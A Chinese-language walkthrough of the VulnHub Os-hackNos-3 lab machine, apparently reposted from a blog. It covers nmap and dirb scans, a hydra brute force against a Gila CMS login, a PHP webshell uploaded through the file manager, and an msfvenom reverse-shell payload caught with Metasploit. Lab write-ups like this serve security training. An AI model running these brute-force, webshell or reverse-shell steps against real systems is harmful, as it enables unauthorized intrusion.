0


Os-hackNos-3靶机

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/

一、信息收集

步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下:

步骤二:使用nmap进行网络扫描,发现目标192.168.7.186为入侵目标靶机...

nmap 192.168.7.0/24

步骤三:端口扫描

nmap -sV  -p- 192.168.7.186

步骤四:使用

dirb

工具对该网站进行目录扫描,发现

/scripts/

路径并访问...并无实际利用点...

dirb http://192.168.7.186/

步骤五:访问这几个文件无果后回到站点主页面,发现

You need extra **WebSec**

在其站点后面添加路径

/websec/

发现是一套CMS站点...

得到了邮箱地址 contact@hacknos.com

步骤六:使用dirb对http://192.168.7.186/websec/进行目录扫描

dirb ​http://192.168.7.186/websec/​

拼接/websec/admin,发现一个登录点

在title处发现

Gila CMS

字样...并搜索发现为一套开源的CMS...

步骤七:使用搜索引擎检索下Gila CMS的可利用漏洞找到以下两个漏洞....文件包含漏洞需要登录后台,所以接下来的思路就是尝试弱口令爆破....

  • Gila CMS < 1.11.1 - Local File Inclusion - Multiple webapps Exploit #文件包含漏洞
  • Gila CMS 1.9.1 - Cross-Site Scripting - PHP webapps Exploit #XSS跨站脚本攻击

步骤八:使用cewl工具对其网站信息进行收集并制作成字典...

cewl http://192.168.7.186/websec/ > passwd.txt

步骤九:使用九头蛇暴力破解

hydra -l [email protected] -P passwd.txt 192.168.7.186 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V

得到账号密码 contact@hacknos.com Securityx

步骤十:在Content—>File Manager处进入tmp目录编辑.htaccess文件,将里面的内容全部删除点击save

进入/tmp/media_thumb/目录下新建一个文件shell.php,并写入一句话木马

访问http://192.168.7.249/websec/tmp/media_thumb/shell.php

蚁剑连接

二、反弹shell

步骤十一:打开瑞士军刀监听端口

在kali中启动mafconsole并进去到监听模式下...并打开浏览器访问shelll.php进行shell反弹

#MSF生成PHP木马
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.250 LPORT=4455 R > shelll.php 
chmod 777 shelll.php

成功生成shelll.php文件

随后在kali开启一个服务

浏览器访问192.168.7.250:8000(192.168.7250为kali的IP)

在蚁剑中打开终端进行远程下载

#kali中启动msfconsole接受Shell反弹
use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.250
set LPORT 4455

浏览器访问shelll.php

成功反弹


本文转载自: https://blog.csdn.net/m0_61995767/article/details/140420306
版权归原作者 嗷嗷~嗷嗷~ 所有, 如有侵权,请联系我们删除。

“Os-hackNos-3靶机”的评论:

还没有评论